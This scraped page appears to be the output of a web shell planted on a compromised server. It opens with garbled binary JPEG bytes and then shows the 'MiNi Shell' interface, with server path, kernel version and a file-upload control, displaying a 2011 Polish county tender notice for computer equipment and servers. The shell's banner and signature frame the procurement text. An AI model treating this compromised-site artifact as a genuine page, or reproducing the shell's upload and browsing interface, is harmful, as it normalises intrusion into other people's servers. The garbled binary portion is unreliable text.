JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111109/372430-N-2011.html

<p class="kh_header"><b>Polkowice: Zakup  sprzętu komputerowego 
na potrzeby Starostwa Powiatowego  w Polkowicach:
I. Zadanie 1:  drukarka, skaner, zestawy komputerowe,
II. Zadanie 2: serwer, sieciowy serwer plików, 
III. Zadanie 3: drukarki etykiet, czytniki kodów kreskowych</b><br>
<b>Numer ogłoszenia: 372430 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Polkowicach , ul. Górna 2, 59-100 Polkowice, woj. dolnośląskie, tel. 76 7461508, faks 76 7461501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatpolkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup  sprzętu komputerowego 
na potrzeby Starostwa Powiatowego  w Polkowicach:
I. Zadanie 1:  drukarka, skaner, zestawy komputerowe,
II. Zadanie 2: serwer, sieciowy serwer plików, 
III. Zadanie 3: drukarki etykiet, czytniki kodów kreskowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Zakup  sprzętu komputerowego na potrzeby Starostwa Powiatowego  w Polkowicach:
I. Zadanie 1:  drukarka, skaner, zestawy komputerowe,
II. Zadanie 2: serwer, sieciowy serwer plików, 
III. Zadanie 3: drukarki etykiet, czytniki kodów kreskowych.
Szczegółowy opis przedmiotu zamówienia - załącznik nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku udzielania, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy dostaw, zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, jeżeli zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne  w użytkowaniu i dozorze, jeżeli zamówienie podstawowe zostało udzielone  w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.61.10-0, 30.21.30.00-5, 48.82.20.00-6, 48.82.30.00-3, 30.21.61.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca spełniał niżej określone warunki dotyczące: - posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; - Zamawiający wymaga aby wykonawca nie podlegał wykluczeniu (art. 24 ustawy). Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie spełnia. Niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca spełniał niżej określone warunki dotyczące: - posiadania wiedzy i doświadczenia; Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie spełnia. Niespełnienie chociaż jednego  z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załączonego wzoru nr 2 ),
2) pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
3) pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty),
4) zaparafowany projekt umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartej umowy wtedy, gdy: 
    1.   termin realizacji ulegnie wydłużeniu z przyczyn leżących po stronie Zamawiającego.
    2.  jakieś zdarzenie bądź ciąg zdarzeń obiektywnie niezależnych od Zamawiającego lub Wykonawcy (których zamawiający i wykonawca nie mogli przewidzieć i którym nie mogli zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działania   z należytą starannością) zasadniczo utrudni wykonanie części zobowiązań umowy, bądź wpłynie na brzmienie zapisów w umowie;  
Na okoliczność o których mowa w pkt 1 i 2 zostanie sporządzony aneks do umowy  z Wykonawcą</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://starostwo.polkowice.sisco.info/?id=2279<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Polkowicach, ul. Górna 2, 59-100 Polkowice, pok. Nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Polkowicach   ul. Górna 2, 59-100 Polkowice, Kancelaria (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE 1:  DRUKARKA, SKANER, ZESTAWY KOMPUTEROWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Drukarka, w ilości 1 szt.,  o minimalnych parametrach technicznych:
Technologia druku: Monochromatyczny druk laserowy,
Prędkość drukowania - czerń: Do 33 str./min,
Wydruku pierwszej strony - czerń: Poniżej 8,0 s (wyjście z trybu uśpienia),
Szybkość procesora: 600 MHz lub równoważny,
Jakość druku - czerń, tryb best: Do 1200 x 1200 dpi,
Druk dwustronny: Automatyczny (standardowy),
Obciążenie miesięczne: Do 50000 stron,
Liczba podajników papieru: minimum 2,
Wymagania minimalne dotyczące nośników: Papier (o niskiej lub wysokiej gramaturze, zwykły, ekologiczny, szorstki), koperty, etykiety, kartony, folia do przeźroczy, nośniki o wysokiej gramaturze,
Podajnik: Podajnik na 250 arkuszy, uniwersalny podajnik na 50 arkuszy
Wymiary nośników: Podajnik 1: A4, A5, A6, B5, koperty (C5, B5, DL); Podajnik 2: A4, A5, A6,
Gramatura nośników: Podajnik 1: od 60 do 163 g/m2 (prosta ścieżka prowadzenia papieru dla nośników specjalnych);Podajnik 2: od 60 do 120 g/m2,
Pamięć: 128 MB z możliwości rozbudowy do 384 MB,
Język drukarki: minimum emulacja Postscript poziom 3 z automatycznym przełączaniem języków,
Rozwiązania komunikacyjne: Port Hi-Speed USB (zgodny ze specyfikacją USB 2.0), wbudowany interfejs druku do sieci Fast Ethernet, 
Pobór mocy: Maksymalnie 0,4 W (drukarka wyłączona), 8 W (tryb gotowości), 570 W (drukowanie),
Zasilanie: Napięcie zasilania (wejściowe): 220-240 V (? 10%), 50 Hz (? 2 Hz),
Zawartość opakowania: Drukarka, wkład drukujący, podręczny przewodnik, płyta CD (z oprogramowaniem i instrukcją), kabel zasilania, podajnik na 250 arkuszy,
Gwarancja: 12 miesięcy.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.
2. Skaner, w ilości 1 szt., o minimalnych parametrach technicznych:
Typ:	skaner z automatycznym podajnikiem i płaskim modułem skanującym,
Tryby skanowania: simplex/duplex; kolor /skala szarości /monochromatyczny,
Rozdzielczość optyczna: 600 dpi,
Rozdzielczość wyjściowa: od 50 do 600 dpi,
Automatyczny podajnik: na 50 arkuszy A4 (lub maks. 3 plastikowe karty o grubości do 1,4mm),
Gramatura papieru dla modułu ADF: od 41 do 210 g/m2 dla innych formatów niż A8; od 127 do 210 g/m2 dla formatu A8,
Szybkość skanowania (A4 portretowo, kompresja JPEG) kolor: simplex: 30 stron na minutę (300 dpi), duplex: 60 obrazów na minutę (300 dpi),
Szybkość skanowania (A4 portretowo, kompresja JPEG) mono: simplex: 40 stron na minutę (200 dpi), duplex: 80 obrazów na minutę (200 dpi),
Zakres skanowania:od A4 do A8,
Obciążenie: do 4000 dokumentów dziennie,
Skanowanie długich dokumentów: do 3048mm,
Interfejs: USB 2.0 /USB 1.1,
Opcje dodatkowe: ultradźwiękowy czujnik podwójnych pobrań, 
Pobór mocy: maksymalnie 45W,
Gwarancja: 12 miesięcy.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.
3. Zestawy komputerowe stanowiące całość, w ilości 7 szt.,  o minimalnych parametrach  technicznych,  składające się z:
Procesor: liczba rdzeni: 2, liczba wątków: 4, częstotliwość taktowania: 3,2 GHz, pamięć cache: 4 MB, z dopasowanym układem chłodzącym, 
Pamięć: min. 4GB DDR3 1333 MHz,
Płyta główna: złącza minimum 1xPCI, 1xPCI-E 16x, 2xPCI-E 1x, 6xUSB2.0, Układ RAID: 6xSATA
Dysk twardy: min. 500 GB  SATA II, 
Karta graficzna: 1 GB DDR3 pamięci, typ złącza PCI-E x16, wyjścia: D-Sub, DVI, HDMI, z dopasowanym układem chłodzącym,
Karta sieciowa: Gigabit LAN,
Karta dźwiękowa: 8-kanałowa,
Nagrywarka: DVDRW RL,
Czytnik kart pamięci: wewnętrzny, obsługa minimum: SD, SDC, SDHC, MMC, MMC II, CF, XD,
Obudowy Midi ATX z zasilaczem 500W, dodatkowo z przodu 2xUSB oraz wyjście słuchawkowe i mikrofonowe, kieszenie 4x5,25 cali, 2x3,5cali
Sterowanie: klawiatura i mysz optyczna pod USB,
Monitor o przekątnej 19 cala, czas reakcji matrycy 5 ms, o kontraście 50000:1 ACR,o jasności 300 cd/m2, rozdzielczość nominalna:  1440 x 900 pikseli, złącze D-Sub, wyświetlane kolory 16.7 mln,
Gwarancja: 24 miesiące door to door.
Ze względu na standaryzację oprogramowania w Starostwie Powiatowym w Polkowicach powyższe zestawy komputerowe muszą mieć zainstalowany system operacyjny oryginalny Windows Microsoft Windows 7 Professional 32bit PL OEM oraz program biurowy oryginalny Microsoft Office 2010 PL PKC dla Użytkowników Domowych i Małych Firm.
Parametry nie mogą być gorsze od podanych w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.61.10-0, 30.21.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE 2: SERWER, SIECIOWY SERWER PLIKÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Serwer, w ilości 1 szt.,  o minimalnych parametrach technicznych:
Typ obudowy serwera: RACK,
Obsługiwana ilość procesorów: minimum  2,
Zainstalowana ilość procesorów: 2,
Częstotliwość procesora: minimum 2,8 GHz, 
Ilość rdzeni: 6,
Ilość wątków: 12,
Pamięć cache (L3): 12 MB,
Maksymalna ilość dysków twardych: 8 szt.,
Zainstalowana ilość dysków twardych:  4 dyski SAS o pojemności 300 GB każdy, prędkość 10 tyś obrotów na minutę, w kieszeniach Hot Swap,
Sterownik macierzy: obsługa (RAID 0/1/1+0/5/5+0),
Pojemność zainstalowanej pamięci: 12288 MB,
Maksymalna pojemność pamięci: 393216 MB,
Rodzaj zainstalowanej pamięci: DDR3,
Typ pamięci: Registered,
Częstotliwość szyny pamięci: 1333 MHz,
Ilość banków pamięci: 18 szt.,
Ilość wolnych banków pamięci: 12 szt.,
Elementy Hot-Swap: wentylatory, zasilacze, dyski twarde,
Ilość slotów PCI-E 8x v.2.0:	1 szt.,
Ilość slotów PCI-E 4x v.2.0:	2 szt.,
Karta graficzna:  64 MB,
Karta sieciowa: 4 x 10/100/1000 Mbit/s,
Napęd wbudowany:DVD?RW Dual Layer,
Interfejsy, minimum: 1 x Serial, 2 x PS/2, 2 x VGA, 4 x RJ-45 (LAN), 5 x USB 2.0, 1 x SD slot,
Ilość zasilaczy: 2 szt.,
Moc zasilacza: 750 Wat,
Gwarancja: 3 lata w miejscu użytkowania sprzętu.
Ze względu na standaryzację oprogramowania w Starostwie Powiatowym w Polkowicach serwer musi mieć zainstalowany system operacyjny oryginalny Microsoft Windows Server 2008 Standard R2 64Bit/x64 1-4CPU PL 5Clt.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.
2. Sieciowy serwer plików, w ilości 1 szt., o minimalnych parametrach technicznych:
Częstotliwość procesora: minimum 1,2 GHz,
Pamięć: minimum 256 MB DDR,
Maksymalna liczba dysków twardych: 4,
Maksymalna obsługiwana łączna pojemność dysków: 12TB,
Zainstalowane dyski twarde: 4 dyski SATA II o pojemności 500 GB każdy, kieszenie  z funkcją hot-swap,
Konfiguracja RAID: 0, 1, 5, 6 z funkcją rozbudowy i zmiany trybu bez utraty danych,
Interfejs sieciowy: 2x Gigabit LAN,
Złącza zewnętrzne: 2x eSATA, 4x USB,
Wbudowane opcje: wbudowana funkcja zdalnej replikacji do prowadzenia szybkiego backupu danych, wbudowany serwer wydruku, serwer FTP oraz serwer www (php, sql, html),
Zarządzanie: WWW,
Pobór mocy: 11W uśpienie; 26W praca,
Gwarancja: 24 miesiące.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.20.00-6, 48.82.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE 3: DRUKARKI ETYKIET, CZYTNIKI KODÓW KRESKOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Drukarki etykiet, w ilości 3 szt., o minimalnych parametrach technicznych:
Metoda druku: termiczna/termotrasferowa,
Rozdzielczość: min. 203 dpi,
Szerokość wydruku: min. 56 mm,
Długość wydruku: min. 991 mm,
Szybkość wydruku: min. 102 mm/s,
Pamięć: min. 8 MB SDRAM; 4MB Flash,
Interfejsy: USB, RS-232,
Gwarancja: 12 miesięcy.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.
2. Czytniki kodów kreskowych, w ilości 3 szt., o minimalnych parametrach technicznych:
Rodzaj czytnika: ręczny,
Źródło światła: dioda laserowa,
Odległość odczytu: do 203mm,
Wzór skanujący: pojedyncza linia skanująca,
Interfejs: USB,
Sposób wyzwalania odczytu: praca automatyczna, dodatkowo przycisk wyzwalający odczyt,
Gwarancja 12 miesięcy.
Parametry nie mogą być gorsze od podane w specyfikacji.
W przypadku gdy w opisie do SIWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.21.61.30-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com